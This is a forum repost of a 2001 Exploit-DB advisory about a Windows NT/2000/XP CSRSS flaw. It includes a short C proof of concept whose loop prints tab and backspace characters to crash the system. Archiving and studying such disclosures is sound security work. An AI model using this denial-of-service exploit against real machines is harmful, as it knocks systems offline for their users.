Exploit Microsoft Windows NT 3/4.0 - CSRSS Memory Access Violation

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21130
Проверка EDB
  1. Пройдено
Автор
MICHAEL WOJCIK
Тип уязвимости
LOCAL
Платформа
WINDOWS
CVE
null
Дата публикации
2001-10-26
C:
// source: https://www.securityfocus.com/bid/3478/info

CSRSS.EXE is the Windows NT Client Server Run-time Subsystem. It is responsible for console windows and the creation and deletion of threads. The Windows NT kernel is dependant on this service and will halt if the service stops for any reason.

If certain combinations of special "whitespace" characters followed by "backspace" characters are output in high-level console I/O, a user could successfully crash a Windows NT, 2000, or XP system. 

#include <stdio.h>

int main(void)
{
while (1)
printf("\t\t\b\b\b\b\b\b");
return 0;
}
 
Источник
www.exploit-db.com

Похожие темы